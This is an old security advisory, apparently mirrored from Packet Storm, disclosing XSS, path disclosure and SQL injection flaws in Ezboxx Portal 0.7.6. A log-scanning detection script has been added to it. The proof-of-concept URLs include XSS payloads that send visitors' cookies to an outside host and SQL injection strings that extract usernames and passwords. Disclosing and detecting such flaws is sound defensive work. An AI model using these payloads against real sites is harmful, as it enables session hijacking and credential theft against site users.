ezboxxezroot.txt

14 Jan 2007 | Reported by Doron P | Type: packetstorm | Source: packetstormsecurity.com

Ezboxx multiple vulnerabilities in version 0.7.6 and below including Cross-site scripting, Path disclosure, and SQL Injection attacks

Code
`Ezboxx multiple vulnerabilities.  
  
Vulnerable version:  
Ezboxx Portal System Beta v 0.7.6 and below.  
The Ezboxx Portal System Beta v 0.7.6 and below versions are vulnerable to Cross-site scripting, Path disclosure and SQL Injection attacks.  
  
Cross-site scripting:  
----------------------  
Description:  
Input passed to the parameters "pic" (in "piczoom.asp"), "nocatname" (in "user-upload.asp") and "iid" (in "newscomments.asp")  
is not properly verified before being returned to the user as HTML code.  
Therefore an attacker may use any one of these Cross-site scripting issues to execute arbitrary script code in the browser of the site's users.  
  
Proof-of-concept:  
http://[Host]/ezboxx/custom/piczoom.asp?pic=[XSS]  
http://[Host]/ezboxx/boxx/user-upload.asp?nocatname=[XSS] - Login required  
http://[Host]//ezboxx/indexes/newscomments.asp?iid=[XSS]  
  
Examples:  
http://[Host]/ezboxx/custom/piczoom.asp?pic=BugSec'+onerror='window.open("http://www.BugSec.com/Index.php?Security_Consulting_Company=Penetration-Testing&Cookie="+document.cookie)  
http://[Host]/ezboxx/boxx/user-upload.asp?nocatname='><script>location.href='http://www.BugSec.com/Index.php?Info-Sec=Pen_Test&Cookie='+document.cookie</script>  
http://[Host]/ezboxx/indexes/newscomments.asp?iid=200/*<script>location.href='http://www.BugSec.com/Index.php?Information-Security=Application_Security&Cookie='+document.cookie</script>*/  
  
  
Path disclosure:  
------------------  
Description:  
Path information can be disclosed in error pages by passing invalid input to the parameter "cat" in "knowledgebase.asp".  
  
Proof-of-concept:  
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=notnumber  
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=1&Cat=notnumber  
  
Examples:  
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=exam  
http://[Host]/ezboxx/boxx/knowledgebase.asp?Type=1&Cat=exam  
  
  
SQL Injection:  
-------------------  
Description:  
Input passed to the "iid" parameter in "ShowAppendix.asp" isn't properly verified before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.  
An attacker may use this vulnerability to extract any information (such as account passwords) from the database.  
  
Proof-of-concept:  
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=[SQL]  
  
Example:  
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+username+from+members))  
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+password+from+members))  
  
  
Credit:  
Doron P and Eyal G from BugSec  
Tel:+97239622655  
Fax:+97239619351  
Email:Info [^A-t] BugSec \*D.O.T*\ com  
BugSec LTD. - www.BugSec.com  
Security Consulting Company  
`
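For sites still running an affected version, the pages and parameters listed in the advisory can be turned into a log review. The following is an added example, not part of the original advisory: it scans web server log records for the named parameters carrying values outside an expected shape. The log field order, the sample records and the "numeric id" / "plain name" rules are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs

# (page, parameter) pairs named in the advisory -> (issue label, allowed pattern).
# Assumption: iid and Cat are numeric ids; pic and nocatname are plain names/paths.
NUMERIC = re.compile(r"\d+")
PLAIN = re.compile(r"[\w .\-/]*")
RULES = {
    ("piczoom.asp", "pic"): ("xss", PLAIN),
    ("user-upload.asp", "nocatname"): ("xss", PLAIN),
    ("newscomments.asp", "iid"): ("xss", NUMERIC),
    ("knowledgebase.asp", "cat"): ("path-disclosure", NUMERIC),
    ("showappendix.asp", "iid"): ("sqli", NUMERIC),
}

# Constructed sample log. Assumed field order (IIS W3C style):
# date time cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2007-01-14 10:00:01 GET /ezboxx/boxx/ShowAppendix.asp iid=12 200
2007-01-14 10:00:05 GET /ezboxx/boxx/ShowAppendix.asp iid=convert(int,1) 500
2007-01-14 10:00:09 GET /ezboxx/boxx/knowledgebase.asp iid=549&Cat=notnumber 500
2007-01-14 10:00:12 GET /ezboxx/custom/piczoom.asp pic=photos/cat.jpg 200
2007-01-14 10:00:15 GET /ezboxx/custom/piczoom.asp pic=x'+onerror='y 200
2007-01-14 10:00:20 GET /ezboxx/indexes/newscomments.asp iid=200%3Cb%3E 200
"""

def scan_log(text):
    """Return (issue, page, parameter, decoded value) for each rule violation."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 6:
            continue  # skip W3C directive lines and malformed records
        page = fields[3].rsplit("/", 1)[-1].lower()
        # parse_qs percent-decodes values and turns '+' into a space.
        for name, values in parse_qs(fields[4], keep_blank_values=True).items():
            rule = RULES.get((page, name.lower()))
            if rule is None:
                continue
            issue, allowed = rule
            findings.extend((issue, page, name, value)
                            for value in values if not allowed.fullmatch(value))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(*finding, sep="\t")
```

The same allow-list shapes (integer-only ids, restricted names) are the input validation the affected pages lack; output encoding and parameterized queries remain the actual fix.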

Vulners AI Score: 7.4 (High risk)